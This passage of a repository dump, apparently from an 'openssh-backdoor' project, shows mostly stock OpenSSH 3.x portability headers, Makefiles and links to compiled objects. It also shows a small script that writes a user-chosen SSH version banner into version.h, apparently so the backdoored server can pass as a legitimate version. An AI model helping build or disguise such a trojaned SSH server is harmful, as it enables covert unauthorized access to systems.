SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 15 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 16 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 17 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 18 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 19 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 20 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 21 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 22 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 23 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 24 | */ 25 | #ifndef SSH_MSG_H 26 | #define SSH_MSG_H 27 | 28 | void ssh_msg_send(int, u_char, Buffer *); 29 | int ssh_msg_recv(int, Buffer *); 30 | 31 | #endif 32 | -------------------------------------------------------------------------------- /msg.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/msg.o -------------------------------------------------------------------------------- /muie: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | printf "\n\n" 3 | printf "SSH Version Example: OpenSSH_3.6.1p2\n" 4 | 5 | printf "\n\n" 6 | printf "Enter SSH 22 version: " 7 | read SSHV 8 | echo '#define SSH2_version "'$SSHV'"'>> version.h 9 | -------------------------------------------------------------------------------- /nchan.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/nchan.o -------------------------------------------------------------------------------- /openbsd-compat/.cvsignore: -------------------------------------------------------------------------------- 1 | Makefile 2 | -------------------------------------------------------------------------------- /openbsd-compat/Makefile: -------------------------------------------------------------------------------- 1 | # $Id: Makefile.in,v 1.25 2003/02/24 01:55:56 djm Exp $ 2 | 3 | sysconfdir=/etc/ssh 4 | piddir=/var/run 5 | srcdir=. 6 | top_srcdir=.. 7 | 8 | 9 | CC=gcc 10 | LD=gcc 11 | CFLAGS=-g -O2 -Wall -Wpointer-arith -Wno-uninitialized 12 | CPPFLAGS=-I. -I.. -I$(srcdir) -I$(srcdir)/.. -DHAVE_CONFIG_H 13 | LIBS=-lutil -lz -lnsl -lcrypto -lcrypt 14 | AR=/usr/bin/ar 15 | RANLIB=ranlib 16 | INSTALL=/usr/bin/install -c 17 | LDFLAGS=-L. 18 | 19 | OPENBSD=base64.o basename.o bindresvport.o daemon.o dirname.o getcwd.o getgrouplist.o getopt.o glob.o inet_aton.o inet_ntoa.o inet_ntop.o mktemp.o readpassphrase.o realpath.o rresvport.o setenv.o setproctitle.o sigact.o strlcat.o strlcpy.o strmode.o strsep.o vis.o 20 | 21 | COMPAT=bsd-arc4random.o bsd-cray.o bsd-cygwin_util.o bsd-getpeereid.o bsd-misc.o bsd-nextstep.o bsd-snprintf.o bsd-waitpid.o fake-getaddrinfo.o fake-getnameinfo.o xmmap.o 22 | 23 | PORTS=port-irix.o port-aix.o 24 | 25 | .c.o: 26 | $(CC) $(CFLAGS) $(CPPFLAGS) -c $< 27 | 28 | all: libopenbsd-compat.a 29 | 30 | $(COMPAT): ../config.h 31 | $(OPENBSD): ../config.h 32 | $(PORTS): ../config.h 33 | 34 | libopenbsd-compat.a: $(COMPAT) $(OPENBSD) $(PORTS) 35 | $(AR) rv $@ $(COMPAT) $(OPENBSD) $(PORTS) 36 | $(RANLIB) $@ 37 | 38 | clean: 39 | rm -f *.o *.a core 40 | 41 | distclean: clean 42 | rm -f Makefile *~ 43 | -------------------------------------------------------------------------------- /openbsd-compat/Makefile.in: -------------------------------------------------------------------------------- 1 | # $Id: Makefile.in,v 1.25 2003/02/24 01:55:56 djm Exp $ 2 | 3 | sysconfdir=@sysconfdir@ 4 | piddir=@piddir@ 5 | srcdir=@srcdir@ 6 | top_srcdir=@top_srcdir@ 7 | 8 | VPATH=@srcdir@ 9 | CC=@CC@ 10 | LD=@LD@ 11 | CFLAGS=@CFLAGS@ 12 | CPPFLAGS=-I. -I.. -I$(srcdir) -I$(srcdir)/.. @CPPFLAGS@ @DEFS@ 13 | LIBS=@LIBS@ 14 | AR=@AR@ 15 | RANLIB=@RANLIB@ 16 | INSTALL=@INSTALL@ 17 | LDFLAGS=-L. @LDFLAGS@ 18 | 19 | OPENBSD=base64.o basename.o bindresvport.o daemon.o dirname.o getcwd.o getgrouplist.o getopt.o glob.o inet_aton.o inet_ntoa.o inet_ntop.o mktemp.o readpassphrase.o realpath.o rresvport.o setenv.o setproctitle.o sigact.o strlcat.o strlcpy.o strmode.o strsep.o vis.o 20 | 21 | COMPAT=bsd-arc4random.o bsd-cray.o bsd-cygwin_util.o bsd-getpeereid.o bsd-misc.o bsd-nextstep.o bsd-snprintf.o bsd-waitpid.o fake-getaddrinfo.o fake-getnameinfo.o xmmap.o 22 | 23 | PORTS=port-irix.o port-aix.o 24 | 25 | .c.o: 26 | $(CC) $(CFLAGS) $(CPPFLAGS) -c $< 27 | 28 | all: libopenbsd-compat.a 29 | 30 | $(COMPAT): ../config.h 31 | $(OPENBSD): ../config.h 32 | $(PORTS): ../config.h 33 | 34 | libopenbsd-compat.a: $(COMPAT) $(OPENBSD) $(PORTS) 35 | $(AR) rv $@ $(COMPAT) $(OPENBSD) $(PORTS) 36 | $(RANLIB) $@ 37 | 38 | clean: 39 | rm -f *.o *.a core 40 | 41 | distclean: clean 42 | rm -f Makefile *~ 43 | -------------------------------------------------------------------------------- /openbsd-compat/base64.h: -------------------------------------------------------------------------------- 1 | /* $Id: base64.h,v 1.4 2003/02/24 04:45:43 djm Exp $ */ 2 | 3 | #ifndef _BSD_BASE64_H 4 | #define _BSD_BASE64_H 5 | 6 | #include "config.h" 7 | 8 | #ifndef HAVE___B64_NTOP 9 | # ifndef HAVE_B64_NTOP 10 | int b64_ntop(u_char const *src, size_t srclength, char *target, 11 | size_t targsize); 12 | # endif /* !HAVE_B64_NTOP */ 13 | # define __b64_ntop b64_ntop 14 | #endif /* HAVE___B64_NTOP */ 15 | 16 | #ifndef HAVE___B64_PTON 17 | # ifndef HAVE_B64_PTON 18 | int b64_pton(char const *src, u_char *target, size_t targsize); 19 | # endif /* !HAVE_B64_PTON */ 20 | # define __b64_pton b64_pton 21 | #endif /* HAVE___B64_PTON */ 22 | 23 | #endif /* _BSD_BASE64_H */ 24 | -------------------------------------------------------------------------------- /openbsd-compat/base64.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/base64.o -------------------------------------------------------------------------------- /openbsd-compat/basename.h: -------------------------------------------------------------------------------- 1 | /* $Id: basename.h,v 1.3 2003/02/25 03:32:16 djm Exp $ */ 2 | 3 | #ifndef _BASENAME_H 4 | #define _BASENAME_H 5 | #include "config.h" 6 | 7 | #if !defined(HAVE_BASENAME) 8 | 9 | char *basename(const char *path); 10 | 11 | #endif /* !defined(HAVE_BASENAME) */ 12 | #endif /* _BASENAME_H */ 13 | -------------------------------------------------------------------------------- /openbsd-compat/basename.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/basename.o -------------------------------------------------------------------------------- /openbsd-compat/bindresvport.h: -------------------------------------------------------------------------------- 1 | /* $Id: bindresvport.h,v 1.2 2001/02/09 01:55:36 djm Exp $ */ 2 | 3 | #ifndef _BSD_BINDRESVPORT_H 4 | #define _BSD_BINDRESVPORT_H 5 | 6 | #include "config.h" 7 | 8 | #ifndef HAVE_BINDRESVPORT_SA 9 | int bindresvport_sa(int sd, struct sockaddr *sa); 10 | #endif /* !HAVE_BINDRESVPORT_SA */ 11 | 12 | #endif /* _BSD_BINDRESVPORT_H */ 13 | -------------------------------------------------------------------------------- /openbsd-compat/bindresvport.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/bindresvport.o -------------------------------------------------------------------------------- /openbsd-compat/bsd-arc4random.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 1999-2000 Damien Miller. All rights reserved. 3 | * 4 | * Redistribution and use in source and binary forms, with or without 5 | * modification, are permitted provided that the following conditions 6 | * are met: 7 | * 1. Redistributions of source code must retain the above copyright 8 | * notice, this list of conditions and the following disclaimer. 9 | * 2. Redistributions in binary form must reproduce the above copyright 10 | * notice, this list of conditions and the following disclaimer in the 11 | * documentation and/or other materials provided with the distribution. 12 | * 13 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 14 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 15 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 16 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 17 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 18 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 19 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 20 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 21 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 22 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 23 | */ 24 | 25 | /* $Id: bsd-arc4random.h,v 1.2 2001/02/09 01:55:36 djm Exp $ */ 26 | 27 | #ifndef _BSD_ARC4RANDOM_H 28 | #define _BSD_ARC4RANDOM_H 29 | 30 | #include "config.h" 31 | 32 | #ifndef HAVE_ARC4RANDOM 33 | unsigned int arc4random(void); 34 | void arc4random_stir(void); 35 | #endif /* !HAVE_ARC4RANDOM */ 36 | 37 | #endif /* _BSD_ARC4RANDOM_H */ 38 | -------------------------------------------------------------------------------- /openbsd-compat/bsd-arc4random.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/bsd-arc4random.o -------------------------------------------------------------------------------- /openbsd-compat/bsd-cray.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/bsd-cray.o -------------------------------------------------------------------------------- /openbsd-compat/bsd-cygwin_util.h: -------------------------------------------------------------------------------- 1 | /* $Id: bsd-cygwin_util.h,v 1.7 2002/04/15 22:00:52 stevesk Exp $ */ 2 | 3 | /* 4 | * cygwin_util.c 5 | * 6 | * Copyright (c) 2000, 2001, Corinna Vinschen 7 | * 8 | * Redistribution and use in source and binary forms, with or without 9 | * modification, are permitted provided that the following conditions 10 | * are met: 11 | * 1. Redistributions of source code must retain the above copyright 12 | * notice, this list of conditions and the following disclaimer. 13 | * 2. Redistributions in binary form must reproduce the above copyright 14 | * notice, this list of conditions and the following disclaimer in the 15 | * documentation and/or other materials provided with the distribution. 16 | * 17 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 18 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 19 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 20 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 21 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 22 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 23 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 24 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 25 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 26 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 27 | * 28 | * Created: Sat Sep 02 12:17:00 2000 cv 29 | * 30 | * This file contains functions for forcing opened file descriptors to 31 | * binary mode on Windows systems. 32 | */ 33 | 34 | #ifndef _BSD_CYGWIN_UTIL_H 35 | #define _BSD_CYGWIN_UTIL_H 36 | 37 | #ifdef HAVE_CYGWIN 38 | 39 | #include 40 | 41 | int binary_open(const char *filename, int flags, ...); 42 | int binary_pipe(int fd[2]); 43 | int check_nt_auth(int pwd_authenticated, struct passwd *pw); 44 | int check_ntsec(const char *filename); 45 | void register_9x_service(void); 46 | 47 | #define open binary_open 48 | #define pipe binary_pipe 49 | 50 | #endif /* HAVE_CYGWIN */ 51 | 52 | #endif /* _BSD_CYGWIN_UTIL_H */ 53 | -------------------------------------------------------------------------------- /openbsd-compat/bsd-cygwin_util.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/bsd-cygwin_util.o -------------------------------------------------------------------------------- /openbsd-compat/bsd-getpeereid.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright (c) 2002 Damien Miller. All rights reserved. 3 | * 4 | * Redistribution and use in source and binary forms, with or without 5 | * modification, are permitted provided that the following conditions 6 | * are met: 7 | * 1. Redistributions of source code must retain the above copyright 8 | * notice, this list of conditions and the following disclaimer. 9 | * 2. Redistributions in binary form must reproduce the above copyright 10 | * notice, this list of conditions and the following disclaimer in the 11 | * documentation and/or other materials provided with the distribution. 12 | * 13 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 14 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 15 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 16 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 17 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 18 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 19 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 20 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 21 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 22 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 23 | */ 24 | 25 | #include "includes.h" 26 | #undef SO_PEERCRED 27 | RCSID("$Id: bsd-getpeereid.c,v 1.2 2003/03/24 22:07:52 djm Exp $"); 28 | 29 | #if !defined(HAVE_GETPEEREID) 30 | 31 | #include 32 | #include 33 | 34 | #include 35 | 36 | 37 | #if defined(SO_PEERCRED) 38 | int 39 | getpeereid(int s, uid_t *euid, gid_t *gid) 40 | { 41 | struct ucred cred; 42 | socklen_t len = sizeof(cred); 43 | 44 | if (getsockopt(s, SOL_SOCKET, SO_PEERCRED, &cred, &len) < 0) 45 | return (-1); 46 | *euid = cred.uid; 47 | *gid = cred.gid; 48 | 49 | return (0); 50 | } 51 | #else 52 | int 53 | getpeereid(int s, uid_t *euid, gid_t *gid) 54 | { 55 | *euid = geteuid(); 56 | *gid = getgid(); 57 | 58 | return (0); 59 | } 60 | #endif /* defined(SO_PEERCRED) */ 61 | 62 | #endif /* !defined(HAVE_GETPEEREID) */ 63 | -------------------------------------------------------------------------------- /openbsd-compat/bsd-getpeereid.h: -------------------------------------------------------------------------------- 1 | /* $Id: bsd-getpeereid.h,v 1.1 2002/09/12 00:33:02 djm Exp $ */ 2 | 3 | #ifndef _BSD_GETPEEREID_H 4 | #define _BSD_GETPEEREID_H 5 | 6 | #include "config.h" 7 | 8 | #include /* For uid_t, gid_t */ 9 | 10 | #ifndef HAVE_GETPEEREID 11 | int getpeereid(int , uid_t *, gid_t *); 12 | #endif /* HAVE_GETPEEREID */ 13 | 14 | #endif /* _BSD_GETPEEREID_H */ 15 | -------------------------------------------------------------------------------- /openbsd-compat/bsd-getpeereid.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/bsd-getpeereid.o -------------------------------------------------------------------------------- /openbsd-compat/bsd-misc.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/bsd-misc.o -------------------------------------------------------------------------------- /openbsd-compat/bsd-nextstep.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/bsd-nextstep.o -------------------------------------------------------------------------------- /openbsd-compat/bsd-snprintf.h: -------------------------------------------------------------------------------- 1 | /* $Id: bsd-snprintf.h,v 1.2 2001/02/09 01:55:36 djm Exp $ */ 2 | 3 | #ifndef _BSD_SNPRINTF_H 4 | #define _BSD_SNPRINTF_H 5 | 6 | #include "config.h" 7 | 8 | #include /* For size_t */ 9 | 10 | #ifndef HAVE_SNPRINTF 11 | int snprintf(char *str, size_t count, const char *fmt, ...); 12 | #endif /* !HAVE_SNPRINTF */ 13 | 14 | #ifndef HAVE_VSNPRINTF 15 | int vsnprintf(char *str, size_t count, const char *fmt, va_list args); 16 | #endif /* !HAVE_SNPRINTF */ 17 | 18 | 19 | #endif /* _BSD_SNPRINTF_H */ 20 | -------------------------------------------------------------------------------- /openbsd-compat/bsd-snprintf.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/bsd-snprintf.o -------------------------------------------------------------------------------- /openbsd-compat/bsd-waitpid.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Redistribution and use in source and binary forms, with or without 3 | * modification, are permitted provided that the following conditions 4 | * are met: 5 | * 1. Redistributions of source code must retain the above copyright 6 | * notice, this list of conditions and the following disclaimer. 7 | * 2. Redistributions in binary form must reproduce the above copyright 8 | * notice, this list of conditions and the following disclaimer in the 9 | * documentation and/or other materials provided with the distribution. 10 | * 11 | * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR 12 | * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES 13 | * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. 14 | * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, 15 | * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT 16 | * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, 17 | * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY 18 | * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 19 | * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF 20 | * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 21 | */ 22 | 23 | #include "includes.h" 24 | 25 | RCSID("$Id: bsd-waitpid.c,v 1.3 2001/03/26 05:35:34 mouring Exp $"); 26 | 27 | #ifndef HAVE_WAITPID 28 | #include 29 | #include 30 | #include "bsd-waitpid.h" 31 | 32 | pid_t 33 | waitpid(int pid, int *stat_loc, int options) 34 | { 35 | union wait statusp; 36 | pid_t wait_pid; 37 | 38 | if (pid <= 0) { 39 | if (pid != -1) { 40 | errno = EINVAL; 41 | return -1; 42 | } 43 | pid = 0; /* wait4() wants pid=0 for indiscriminate wait. */ 44 | } 45 | wait_pid = wait4(pid, &statusp, options, NULL); 46 | if (stat_loc) 47 | *stat_loc = (int) statusp.w_status; 48 | 49 | return wait_pid; 50 | } 51 | 52 | #endif /* !HAVE_WAITPID */ 53 | -------------------------------------------------------------------------------- /openbsd-compat/bsd-waitpid.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/bsd-waitpid.o -------------------------------------------------------------------------------- /openbsd-compat/daemon.h: -------------------------------------------------------------------------------- 1 | /* $Id: daemon.h,v 1.2 2001/02/09 01:55:36 djm Exp $ */ 2 | 3 | #ifndef _BSD_DAEMON_H 4 | #define _BSD_DAEMON_H 5 | 6 | #include "config.h" 7 | #ifndef HAVE_DAEMON 8 | int daemon(int nochdir, int noclose); 9 | #endif /* !HAVE_DAEMON */ 10 | 11 | #endif /* _BSD_DAEMON_H */ 12 | -------------------------------------------------------------------------------- /openbsd-compat/daemon.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/daemon.o -------------------------------------------------------------------------------- /openbsd-compat/dirname.h: -------------------------------------------------------------------------------- 1 | #ifndef HAVE_DIRNAME 2 | 3 | char *dirname(const char *path); 4 | 5 | #endif 6 | -------------------------------------------------------------------------------- /openbsd-compat/dirname.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/dirname.o -------------------------------------------------------------------------------- /openbsd-compat/fake-gai-errnos.h: -------------------------------------------------------------------------------- 1 | /* 2 | * fake library for ssh 3 | * 4 | * This file is included in getaddrinfo.c and getnameinfo.c. 5 | * See getaddrinfo.c and getnameinfo.c. 6 | */ 7 | 8 | /* $Id: fake-gai-errnos.h,v 1.2 2001/02/09 01:55:36 djm Exp $ */ 9 | 10 | /* for old netdb.h */ 11 | #ifndef EAI_NODATA 12 | #define EAI_NODATA 1 13 | #define EAI_MEMORY 2 14 | #endif 15 | -------------------------------------------------------------------------------- /openbsd-compat/fake-getaddrinfo.h: -------------------------------------------------------------------------------- 1 | /* $Id: fake-getaddrinfo.h,v 1.4 2003/02/24 01:35:09 djm Exp $ */ 2 | 3 | #ifndef _FAKE_GETADDRINFO_H 4 | #define _FAKE_GETADDRINFO_H 5 | 6 | #include "config.h" 7 | 8 | #include "fake-gai-errnos.h" 9 | 10 | #ifndef AI_PASSIVE 11 | # define AI_PASSIVE 1 12 | # define AI_CANONNAME 2 13 | #endif 14 | 15 | #ifndef NI_NUMERICHOST 16 | # define NI_NUMERICHOST 2 17 | # define NI_NAMEREQD 4 18 | # define NI_NUMERICSERV 8 19 | #endif 20 | 21 | #ifndef HAVE_STRUCT_ADDRINFO 22 | struct addrinfo { 23 | int ai_flags; /* AI_PASSIVE, AI_CANONNAME */ 24 | int ai_family; /* PF_xxx */ 25 | int ai_socktype; /* SOCK_xxx */ 26 | int ai_protocol; /* 0 or IPPROTO_xxx for IPv4 and IPv6 */ 27 | size_t ai_addrlen; /* length of ai_addr */ 28 | char *ai_canonname; /* canonical name for hostname */ 29 | struct sockaddr *ai_addr; /* binary address */ 30 | struct addrinfo *ai_next; /* next structure in linked list */ 31 | }; 32 | #endif /* !HAVE_STRUCT_ADDRINFO */ 33 | 34 | #ifndef HAVE_GETADDRINFO 35 | int getaddrinfo(const char *hostname, const char *servname, 36 | const struct addrinfo *hints, struct addrinfo **res); 37 | #endif /* !HAVE_GETADDRINFO */ 38 | 39 | #ifndef HAVE_GAI_STRERROR 40 | char *gai_strerror(int ecode); 41 | #endif /* !HAVE_GAI_STRERROR */ 42 | 43 | #ifndef HAVE_FREEADDRINFO 44 | void freeaddrinfo(struct addrinfo *ai); 45 | #endif /* !HAVE_FREEADDRINFO */ 46 | 47 | #endif /* _FAKE_GETADDRINFO_H */ 48 | -------------------------------------------------------------------------------- /openbsd-compat/fake-getaddrinfo.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/fake-getaddrinfo.o -------------------------------------------------------------------------------- /openbsd-compat/fake-getnameinfo.c: -------------------------------------------------------------------------------- 1 | /* 2 | * fake library for ssh 3 | * 4 | * This file includes getnameinfo(). 5 | * These funtions are defined in rfc2133. 6 | * 7 | * But these functions are not implemented correctly. The minimum subset 8 | * is implemented for ssh use only. For exapmle, this routine assumes 9 | * that ai_family is AF_INET. Don't use it for another purpose. 10 | */ 11 | 12 | #include "includes.h" 13 | #include "ssh.h" 14 | 15 | RCSID("$Id: fake-getnameinfo.c,v 1.2 2001/02/09 01:55:36 djm Exp $"); 16 | 17 | #ifndef HAVE_GETNAMEINFO 18 | int getnameinfo(const struct sockaddr *sa, size_t salen, char *host, 19 | size_t hostlen, char *serv, size_t servlen, int flags) 20 | { 21 | struct sockaddr_in *sin = (struct sockaddr_in *)sa; 22 | struct hostent *hp; 23 | char tmpserv[16]; 24 | 25 | if (serv) { 26 | snprintf(tmpserv, sizeof(tmpserv), "%d", ntohs(sin->sin_port)); 27 | if (strlen(tmpserv) >= servlen) 28 | return EAI_MEMORY; 29 | else 30 | strcpy(serv, tmpserv); 31 | } 32 | 33 | if (host) { 34 | if (flags & NI_NUMERICHOST) { 35 | if (strlen(inet_ntoa(sin->sin_addr)) >= hostlen) 36 | return EAI_MEMORY; 37 | 38 | strcpy(host, inet_ntoa(sin->sin_addr)); 39 | return 0; 40 | } else { 41 | hp = gethostbyaddr((char *)&sin->sin_addr, 42 | sizeof(struct in_addr), AF_INET); 43 | if (hp == NULL) 44 | return EAI_NODATA; 45 | 46 | if (strlen(hp->h_name) >= hostlen) 47 | return EAI_MEMORY; 48 | 49 | strcpy(host, hp->h_name); 50 | return 0; 51 | } 52 | } 53 | return 0; 54 | } 55 | #endif /* !HAVE_GETNAMEINFO */ 56 | -------------------------------------------------------------------------------- /openbsd-compat/fake-getnameinfo.h: -------------------------------------------------------------------------------- 1 | /* $Id: fake-getnameinfo.h,v 1.2 2001/02/09 01:55:36 djm Exp $ */ 2 | 3 | #ifndef _FAKE_GETNAMEINFO_H 4 | #define _FAKE_GETNAMEINFO_H 5 | 6 | #include "config.h" 7 | 8 | #ifndef HAVE_GETNAMEINFO 9 | int getnameinfo(const struct sockaddr *sa, size_t salen, char *host, 10 | size_t hostlen, char *serv, size_t servlen, int flags); 11 | #endif /* !HAVE_GETNAMEINFO */ 12 | 13 | #ifndef NI_MAXSERV 14 | # define NI_MAXSERV 32 15 | #endif /* !NI_MAXSERV */ 16 | #ifndef NI_MAXHOST 17 | # define NI_MAXHOST 1025 18 | #endif /* !NI_MAXHOST */ 19 | 20 | #endif /* _FAKE_GETNAMEINFO_H */ 21 | -------------------------------------------------------------------------------- /openbsd-compat/fake-getnameinfo.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Te-k/openssh-backdoor/708bbea33f99fe3b0f5a333d12b3881bdc620b33/openbsd-compat/fake-getnameinfo.o -------------------------------------------------------------------------------- /openbsd-compat/fake-socket.h: -------------------------------------------------------------------------------- 1 | /* $Id: fake-socket.h,v 1.3 2002/04/12 03:35:40 tim Exp $ */ 2 | 3 | #ifndef _FAKE_SOCKET_H 4 | #define _FAKE_SOCKET_H 5 | 6 | #include "includes.h" 7 | #include "sys/types.h" 8 | 9 | #ifndef HAVE_STRUCT_SOCKADDR_STORAGE 10 | # define _SS_MAXSIZE 128 /* Implementation specific max size */ 11 | # define _SS_PADSIZE (_SS_MAXSIZE - sizeof (struct sockaddr)) 12 | 13 | struct sockaddr_storage { 14 | struct sockaddr ss_sa; 15 | char __ss_pad2[_SS_PADSIZE]; 16 | }; 17 | # define ss_family ss_sa.sa_family 18 | #endif /* !HAVE_STRUCT_SOCKADDR_STORAGE */ 19 | 20 | #ifndef IN6_IS_ADDR_LOOPBACK 21 | # define IN6_IS_ADDR_LOOPBACK(a) \ 22 | (((u_int32_t *) (a))[0] == 0 && ((u_int32_t *) (a))[1] == 0 && \ 23 | ((u_int32_t *) (a))[2] == 0 && ((u_int32_t *) (a))[3] == htonl (1)) 24 | #endif /* !IN6_IS_ADDR_LOOPBACK */ 25 | 26 | #ifndef HAVE_STRUCT_IN6_ADDR 27 | struct in6_addr { 28 | u_int8_t s6_addr[16]; 29 | }; 30 | #endif /* !HAVE_STRUCT_IN6_ADDR */ 31 | 32 | #ifndef HAVE_STRUCT_SOCKADDR_IN6 33 | struct sockaddr_in6 { 34 | unsigned short sin6_family; 35 | u_int16_t sin6_port; 36 | u_int32_t sin6_flowinfo; 37 | struct in6_addr sin6_addr; 38 | }; 39 | #endif /* !HAVE_STRUCT_SOCKADDR_IN6 */ 40 | 41 | #ifndef AF_INET6 42 | /* Define it to something that should never appear */ 43 | #define AF_INET6 AF_MAX 44 | #endif 45 | 46 | #endif /* !_FAKE_SOCKET_H 